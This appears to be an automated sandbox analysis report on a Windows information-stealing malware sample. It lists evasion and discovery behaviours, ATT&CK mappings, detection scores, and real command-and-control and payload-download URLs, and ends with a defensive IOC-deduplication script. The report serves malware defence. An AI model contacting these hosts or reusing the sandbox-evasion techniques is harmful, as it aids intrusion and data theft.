Source: Amcache.hve.4.dr; Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr; Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: jicQJ2cdlM.exe, 00000000.00000003.4048093961.0000000000886000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000002.4174618385.0000000000886000.00000004.00000020.00020000.00000000.sdmp, A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E39000.00000004.00000020.00020000.00000000.sdmp, A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E87000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
Source: Amcache.hve.4.dr; Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr; Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.4.dr; Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.dr; Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr; Binary or memory string: vmci.sys
Source: Amcache.hve.4.dr; Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.4.dr; Binary or memory string: vmci.syshbin`
Source: Amcache.hve.4.dr; Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.4.dr; Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr; Binary or memory string: VMware20,1
Source: Amcache.hve.4.dr; Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.dr; Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.dr; Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E33000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: VMwareVMware
Source: Amcache.hve.4.dr; Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.4.dr; Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: jicQJ2cdlM.exe, 00000000.00000003.4048093961.0000000000859000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000002.4174618385.000000000085A000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAWH
Source: Amcache.hve.4.dr; Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.dr; Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.4.dr; Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.4.dr; Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.dr; Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.4.dr; Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; API call chain: ExitProcess graph end node (graph_1-26319)
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; API call chain: ExitProcess graph end node (graph_1-26298)
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; API call chain: ExitProcess graph end node (graph_1-26301)
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; API call chain: ExitProcess graph end node (graph_1-26140)
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; API call chain: ExitProcess graph end node (graph_1-26312)
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; API call chain: ExitProcess graph end node (graph_1-26185)
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; API call chain: ExitProcess graph end node (graph_1-27711)
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; API call chain: ExitProcess graph end node (graph_1-26341)
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Code function: 0_2_0042A3F3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Code function: 1_2_004045C0 VirtualProtect ?,00000004,00000100,00000000
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Code function: 0_2_0041EC7E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Code function: 0_2_0042FE7F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Code function: 0_2_007F9B2B push dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Code function: 0_2_00A100E6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Code function: 0_2_009E092B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Code function: 0_2_009E0D90 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Code function: 1_2_00419750 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Code function: 1_2_02D10D90 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Code function: 1_2_02D299B7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Code function: 1_2_02D1092B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Code function: 1_2_02E09ABB push dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Code function: 0_2_0043BBE1 GetProcessHeap
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Code function: 0_2_004104F3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Code function: 0_2_00410686 SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Code function: 0_2_0040F936 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Code function: 0_2_00A0A65A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Code function: 0_2_009F075A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Code function: 0_2_009F08ED SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Code function: 0_2_009EFB9D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Code function: 1_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Code function: 1_2_0041CEEA SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Code function: 1_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Code function: 1_2_02D2AFAF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Code function: 1_2_02D2B5A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Code function: 1_2_02D2D151 SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match; File source: Process Memory Space: A8A9.tmp.exe PID: 7404, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Code function: 1_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Code function: 1_2_02D29867 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Process created: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe "C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe"
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Code function: 0_2_0041079B cpuid
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Code function: 0_2_0043B02A IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Code function: 0_2_004351E0 GetLocaleInfoW
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Code function: 0_2_0043B2ED EnumSystemLocalesW
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Code function: 0_2_0043B2A2 EnumSystemLocalesW
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Code function: 0_2_0043B388 EnumSystemLocalesW
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Code function: 0_2_0043B415 GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Code function: 0_2_0043B665 GetLocaleInfoW
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Code function: 0_2_0043B78E GetLocaleInfoW,GetLocaleInfoW,GetACP
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Code function: 0_2_0043B895 GetLocaleInfoW
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Code function: 0_2_0043B962 GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Code function: 0_2_00434DED EnumSystemLocalesW
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Code function: 0_2_00A15054 EnumSystemLocalesW
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Code function: 0_2_00A1B291 IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Code function: 0_2_00A15447 GetLocaleInfoW
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Code function: 0_2_00A1B5EF EnumSystemLocalesW
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Code function: 0_2_00A1B509 EnumSystemLocalesW
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Code function: 0_2_00A1B554 EnumSystemLocalesW
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Code function: 0_2_00A1B8CC GetLocaleInfoW
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Code function: 0_2_00A1B9F5 GetLocaleInfoW,GetLocaleInfoW,GetACP
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Code function: 0_2_00A1BAFC GetLocaleInfoW
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Code function: 0_2_00A1BBC9 GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Code function: 1_2_00417B90 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Code function: 1_2_02D27DF7 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Code function: 0_2_004103ED GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Code function: 1_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Code function: 1_2_00417A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Code function: 0_2_0041640A GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8
Source: Amcache.hve.4.dr; Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.dr; Binary or memory string: msmpeng.exe
Source: Amcache.hve.4.dr; Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.4.dr; Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match; File source: 1.3.A8A9.tmp.exe.2d60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.A8A9.tmp.exe.2d10e67.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.A8A9.tmp.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.3.A8A9.tmp.exe.2d60000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.A8A9.tmp.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.A8A9.tmp.exe.2d10e67.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000001.00000002.2054517436.0000000002E39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000003.1833028905.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: A8A9.tmp.exe PID: 7404, type: MEMORYSTR
Source: Yara match; File source: dump.pcap, type: PCAP

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 1.3.A8A9.tmp.exe.2d60000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.A8A9.tmp.exe.2d10e67.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.A8A9.tmp.exe.400000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.3.A8A9.tmp.exe.2d60000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.A8A9.tmp.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.A8A9.tmp.exe.2d10e67.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.2054517436.0000000002E39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.1833028905.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: A8A9.tmp.exe PID: 7404, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_004218EC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_004218EC
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_00420C16 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_00420C16
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_00A01B53 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_00A01B53
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_00A00E7D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_00A00E7D
MITRE ATT&CK matrix, listed by tactic. Techniques followed by a number are the ones the report matched (the number is the badge shown next to the technique in the matrix); the remaining entries are the matrix's unmatched cells.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: Native API (13); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: Process Injection (111); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (11); Disable or Modify Tools (11); Process Injection (111); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (22); DLL Side-Loading (1); HTML Smuggling; Dynamic API Resolution
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: System Time Discovery (2); Query Registry (1); Security Software Discovery (131); Virtualization/Sandbox Evasion (11); Process Discovery (11); Application Window Discovery (1); Account Discovery (1); System Owner/User Discovery (1); File and Directory Discovery (2); System Information Discovery (134)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: Archive Collected Data (1); Clipboard Data (3); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: Encrypted Channel (21); Ingress Tool Transfer (12); Non-Application Layer Protocol (3); Application Layer Protocol (114); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Antivirus, Machine Learning and Genetic Malware Detection

Initial sample
Source | Detection | Scanner | Label
jicQJ2cdlM.exe | 32% | ReversingLabs |
jicQJ2cdlM.exe | 100% | Joe Sandbox ML |

Dropped files
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe | 100% | Avira | HEUR/AGEN.1312567
C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | 100% | Avira | HEUR/AGEN.1312567
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe | 34% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | 34% | ReversingLabs |

Unpacked PE files: No Antivirus matches
Domains: No Antivirus matches

URLs
Source | Detection | Scanner | Label
http://upx.sf.net | 0% | URL Reputation | safe
Contacted Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
post-to-me.com | 104.21.56.70 | true | false | | unknown

Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
http://62.204.41.177/edd20096ecef326d.php | true | | unknown
https://post-to-me.com/track_prt.php?sub=0&cc=DE | false | | unknown
http://62.204.41.177/ | true | | unknown
URLs from Memory and Binaries (the Name column is the string exactly as found, so several entries carry one or two stray bytes after the real URL)
Name | Source | Malicious | Antivirus Detection | Reputation
http://62.204.41.177/edd20096ecef326d.phpL | A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E6A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://post-to-me.com/track_prt.php?sub=&cc=DE | jicQJ2cdlM.exe, 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp | false | | unknown
https://post-to-me.com/track_prt.php?sub= | jicQJ2cdlM.exe | false | | unknown
http://176.113.115.37/ScreenUpdateSync.exeP | jicQJ2cdlM.exe, 00000000.00000003.4048046249.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000002.4174714149.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000003.1784148548.000000000089D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://62.204.41.177/K | A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E39000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://62.204.41.177/edd20096ecef326d.phpJ | A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E87000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://176.113.115.37/ScreenUpdateSync.exek4 | jicQJ2cdlM.exe, 00000000.00000003.1784148548.000000000089D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://62.204.41.177/$c | A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E6A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://62.204.41.177/edd20096ecef326d.php6 | A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E33000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://post-to-me.com/track_prt.php?sub=0&cc=DET | jicQJ2cdlM.exe, 00000000.00000003.4048093961.0000000000878000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000002.4174618385.0000000000878000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://176.113.115.37/ScreenUpdateSync.exe48rt8k8rt4rwe5rbSOFTWARE | jicQJ2cdlM.exe, 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp | false | | unknown
https://post-to-me.com/ | jicQJ2cdlM.exe, 00000000.00000003.4048093961.0000000000878000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000002.4174618385.0000000000878000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://upx.sf.net | Amcache.hve.4.dr | false | URL Reputation: safe | unknown
https://post-to-me.com/v | jicQJ2cdlM.exe, 00000000.00000003.4048093961.0000000000878000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000002.4174618385.0000000000878000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://176.113.115.37/ScreenUpdateSync.exea | jicQJ2cdlM.exe, 00000000.00000003.1784148548.000000000089D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://62.204.41.177/edd20096ecef326d.phpIc | A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E6A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://176.113.115.37/ScreenUpdateSync.exe | jicQJ2cdlM.exe, jicQJ2cdlM.exe, 00000000.00000003.4048046249.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000002.4174714149.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000003.4048093961.000000000086F000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000003.1784148548.000000000089D000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000002.4174618385.000000000086F000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://62.204.41.177/edd20096ecef326d.phpGc: | A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E6A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://62.204.41.177 | A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E39000.00000004.00000020.00020000.00000000.sdmp, A8A9.tmp.exe, 00000001.00000002.2054458680.0000000002DFE000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://62.204.41.177/edd20096ecef326d.phpb | A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E87000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://62.204.41.177S | A8A9.tmp.exe, 00000001.00000002.2054458680.0000000002DFE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
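The memory-string table above lists the same few endpoints many times, each with a different byte or two glued on (phpL, phpJ, exeP, 177S), because the string scanner stops at a heuristic boundary rather than at the URL's real end. The Python below is an added example (not Joe Sandbox's code) of turning such rows into a deduplicated IOC list: it trims the host back to a valid IPv4 address or hostname, cuts a path after a recognised resource extension, snaps each string to the longest URL from the Contacted URLs table that is a prefix of it, and flags bare hosts and one- or two-character paths for manual review. The row data is copied from the tables above; the extension list, the review heuristic and the function names are this example's own assumptions.

```python
import re
from collections import defaultdict

# Rows copied from the "URLs from Memory and Binaries" table above:
# (string as found, process or file it was found in).
MEMORY_STRINGS = [
    ("http://62.204.41.177/edd20096ecef326d.phpL", "A8A9.tmp.exe"),
    ("https://post-to-me.com/track_prt.php?sub=&cc=DE", "jicQJ2cdlM.exe"),
    ("https://post-to-me.com/track_prt.php?sub=", "jicQJ2cdlM.exe"),
    ("http://176.113.115.37/ScreenUpdateSync.exeP", "jicQJ2cdlM.exe"),
    ("http://62.204.41.177/K", "A8A9.tmp.exe"),
    ("http://62.204.41.177/edd20096ecef326d.phpJ", "A8A9.tmp.exe"),
    ("http://176.113.115.37/ScreenUpdateSync.exek4", "jicQJ2cdlM.exe"),
    ("http://62.204.41.177/$c", "A8A9.tmp.exe"),
    ("http://62.204.41.177/edd20096ecef326d.php6", "A8A9.tmp.exe"),
    ("https://post-to-me.com/track_prt.php?sub=0&cc=DET", "jicQJ2cdlM.exe"),
    ("http://176.113.115.37/ScreenUpdateSync.exe48rt8k8rt4rwe5rbSOFTWARE", "jicQJ2cdlM.exe"),
    ("https://post-to-me.com/", "jicQJ2cdlM.exe"),
    ("http://upx.sf.net", "Amcache.hve.4.dr"),
    ("https://post-to-me.com/v", "jicQJ2cdlM.exe"),
    ("http://176.113.115.37/ScreenUpdateSync.exea", "jicQJ2cdlM.exe"),
    ("http://62.204.41.177/edd20096ecef326d.phpIc", "A8A9.tmp.exe"),
    ("http://176.113.115.37/ScreenUpdateSync.exe", "jicQJ2cdlM.exe"),
    ("http://62.204.41.177/edd20096ecef326d.phpGc:", "A8A9.tmp.exe"),
    ("http://62.204.41.177", "A8A9.tmp.exe"),
    ("http://62.204.41.177/edd20096ecef326d.phpb", "A8A9.tmp.exe"),
    ("http://62.204.41.177S", "A8A9.tmp.exe"),
]

# "Contacted URLs" table above: URL actually seen on the wire -> malicious flag.
OBSERVED_URLS = {
    "http://62.204.41.177/edd20096ecef326d.php": True,
    "https://post-to-me.com/track_prt.php?sub=0&cc=DE": False,
    "http://62.204.41.177/": True,
}

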